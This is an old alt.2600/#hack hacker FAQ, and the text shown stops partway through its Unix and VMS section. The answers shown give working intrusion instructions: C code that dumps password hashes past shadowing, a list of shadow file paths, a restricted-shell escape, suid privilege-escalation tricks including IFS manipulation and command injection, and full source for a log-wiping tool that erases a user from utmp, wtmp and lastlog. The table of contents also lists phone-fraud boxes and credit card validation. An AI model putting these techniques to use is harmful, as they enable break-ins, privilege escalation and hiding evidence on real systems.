Editors Note: Welcome to Beta .008 of the alt.2600/#hack FAQ! The FAQ suffered from a floppy disk crash. I believe I have corrected all errors resulting from the crash. If you find any that I missed, please e-mail me. This edition of the FAQ is dedicated to Taran King, who has put in many long hours keeping the HTML version of this document up to date. If you have a questions regarding any of the topics covered in the FAQ, please direct it to alt.2600 or #hack. Please do not e-mail me with them, I'm getting swamped. If your copy of the #hack FAQ does not end with the letters EOT on a line by themselves, you do not have the entire FAQ. Thanks go out to Boris Ginsburgs for his work in spell checking the FAQ! ** BETA ** Beta Revision .008 alt.2600/#Hack F.A.Q. by Voyager will@gnu.ai.mit.edu Sysop of Hacker's Haven (303)343-4053 With special thanks to: A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow, Major, Presence, Rogue Agent, sbin, Taran King, Tomes and TheSaint. We work in the dark We do what we can We give what we have Our doubt is our passion, and our passion is our task The rest is the madness of art. -- Henry James Section A: Computers 01. How do I access the password file under Unix? 02. How do I crack Unix passwords? 03. What is password shadowing? N 04. Where can I find the password file if it's shadowed? 05. What is NIS/yp? N 06. What are those weird characters after the comma in my passwd file? 07. How do I access the password file under VMS? 08. How do I crack VMS passwords? 09. How do I break out of a restricted shell? 10. How do I gain root from a suid script or program? 11. How do I erase my presence from the system logs? 12. How do I send fakemail? 13. How do I fake posts to UseNet? 14. How do I hack ChanOp on IRC? 15. How do I modify the IRC client to hide my real username? 16. How to I change to directories with strange characters in them? U 17. What is ethernet sniffing? 18. What is an Internet Outdial? 19. What are some Internet Outdials? U 20. What is this system? U 21. What are the default accounts for XXX ? U 22. What port is XXX on? 23. What is a trojan/worm/virus/logic bomb? 24. How can I protect myself from virii and such? 25. What is Cryptoxxxxxxx? 26. What is PGP? 27. What is Tempest? 28. What is an anonymous remailer? 29. What are the addresses of some anonymous remailers? 30. How do I defeat copy protection? Section B: Telephony 01. What is a Red Box? 02. How do I build a Red Box? U 03. Where can I get a 6.5536Mhz crystal? 04. Which payphones will a Red Box work on? 05. What is a Blue Box? 06. Do Blue Boxes still work? 07. What is a Black Box? 08. What do all the colored boxes do? N 09. What is an ANAC number? U 10. What is the ANAC number for my area? 11. What is a ringback number? 12. What is the ringback number for my area? 13. What is a loop? 14. What is a loop in my area? U 15. What is a CNA number? 16. What is the telephone company CNA number for my area? N 17. What are some numbers that always ring busy? N 18. What are some numbers that temporarily disconnect phone service? 19. What is scanning? 20. Is scanning illegal? U 21. Where can I purchase a lineman's handset? 22. What are the DTMF frequencies? N 23. What are all of the * codes? N 24. What frequencies do cordless phones operate on? Section C: Resources U 01. What are some ftp sites of interest to hackers? U 02. What are some newsgroups of interest to hackers? 03. What are some telnet sites of interest to hackers? 04. What are some gopher sites of interest to hackers? U 05. What are some World wide Web (WWW) sites of interest to hackers? 06. What are some IRC channels of interest to hackers? U 07. What are some BBS's of interest to hackers? 08. What books are available on this subject? 09. What are some mailing lists of interest to hackers? U 10. What are some print magazines of interest to hackers? 11. What are some organizations of interest to hackers? N 12. Where can I purchase a magnetic stripe encoder/decoder? Section D: 2600 01. What is alt.2600? 02. What does "2600" mean? 03. Are there on-line versions of 2600 available? 04. I can't find 2600 at any bookstores. What can I do? U 05. Why does 2600 cost more to subscribe to than to buy at a newsstand? Section E: Miscellaneous U 01. What does XXX stand for? 02. How do I determine if I have a valid credit card number? 03. Where can I get a copy of the #hack FAQ? N 04. What are the ethics of hacking? U == Updated since last release of the #hack FAQ N == New since last release of the #hack FAQ Section A: Computers ~~~~~~~~~~~~~~~~~~~~ 01. How do I access the password file under Unix? In standard Unix the password file is /etc/passwd. On a Unix system with either NIS/yp or password shadowing, much of the password data may be elsewhere. 02. How do I crack Unix passwords? Contrary to popular belief, Unix passwords cannot be decrypted. Unix passwords are encrypted with a one way function. The login program encrypts the text you enter at the "password:" prompt and compares that encrypted string against the encrypted form of your password. Password cracking software uses wordlists. Each word in the wordlist is encrypted with each of the 4096 possible salt values and the results are compared to the encrypted form of the target password. The best cracking program for Unix passwords is currently Crack by Alec Muffett. For PC-DOS, the best package to use is currently CrackerJack. 03. What is password shadowing? Password shadowing is a security system where the encrypted password field of /etc/password is replaced with a special token and the encrypted password is stored in a separate file which is not readable by normal system users. To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file. Example: #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 04. Where can I find the password file if it's shadowed? Unix Path Token ----------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 0.99 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * 06. What is NIS/yp? NIS (Network Information System) in the current name for what was once known as yp (Yellow Pages). The purpose for NIS is to allow many machines on a network to share configuration information, including password data. NIS is not designed to promote system security. If your system uses NIS you will have a very short /etc/passwd file with a line that looks like this: +::0:0::: To view the real password file use this command "ypcat passwd" 05. What are those weird characters after the comma in my passwd file? The characters are password aging data. Password aging forces the user to change passwords after a System Administrator specified period of time. Password aging can also force a user to keep a password for a certain number of weeks before changing it. ] ] Sample entry from /etc/passwd with password aging installed: ] ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] Note the comma in the encrypted password field. The characters after the comma are used by the password aging mechanism. ] ] Password aging characters from above example: ] ] M.z8 ] The four characters are interpreted as follows: 1: Maximum number of weeks a password can be used without changing. 2: Minimum number of weeks a password must be used before changing. 3&4: Last time password was changed, in number of weeks since 1970. Three special cases should be noted: If the first and second characters are set to '..' the user will be forced to change his/her passwd the next time he/she logs in. The passwd program will then remove the passwd aging characters, and the user will not be subjected to password aging requirements again. If the third and fourth characters are set to '..' the user will be forced to change his/her passwd the next time he/she logs in. Password aging will then occur as defined by the first and second characters. If the first character (MAX) is less than the second character (MIN), the user is not allowed to change his/her password. Only root can change that users password. It should also be noted that the su command does not check the password aging data. An account with an expired password can be su'd to without being forced to change the password. Password Aging Codes +---------------------------------------------------------------------- --+ | | | Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H | | Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | | | Character: I J K L M N O P Q R S T U V W X Y Z a b | | Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | | | Character: c d e f g h i j k l m n o p q r s t u v | | Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | | | Character: w x y z | | Number: 60 61 62 63 | | | +---------------------------------------------------------------------- --+ 07. How do I access the password file under VMS? Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However, unlike Unix, most users do not have access to read the password file. 08. How do I crack VMS passwords? Write a program that uses the SYS$GETUAF functions to compare the results of encrypted words against the encrypted data in SYSUAF.DAT. Two such programs are known to exist, CHECK_PASSWORD and GUESS_PASSWORD. 09. How do I break out of a restricted shell? On poorly implemented restricted shells you can break out of the restricted environment by running a program that features a shell function. A good example is vi. Run vi and use this command: :set shell=/bin/sh then shell using this command: :shell 10. How do I gain root from a suid script or program? 1. Change IFS. If the program calls any other programs using the system() function call, you may be able to fool it by changing IFS. IFS is the Internal Field Separator that the shell uses to delimit arguments. If the program contains a line that looks like this: system("/bin/date") and you change IFS to '/' the shell will them interpret the proceeding line as: bin date Now, if you have a program of your own in the path called "bin" the suid program will run your program instead of /bin/date. To change IFS, use this command: IFS='/';export IFS # Bourne Shell setenv IFS '/' # C Shell export IFS='/' # Korn Shell 2. link the script to -i Create a symbolic link named "-i" to the program. Running "-i" will cause the interpreter shell (/bin/sh) to start up in interactive mode. This only works on suid shell scripts. Example: % ln suid.sh -i % -i # 3. Exploit a race condition Replace a symbolic link to the program with another program while the kernel is loading /bin/sh. Example: nice -19 suidprog ; ln -s evilprog suidroot 4. Send bad input to the program. Invoke the name of the program and a separate command on the same command line. Example: suidprog ; id 11. How do I erase my presence from the system logs? Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose. Example: #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); }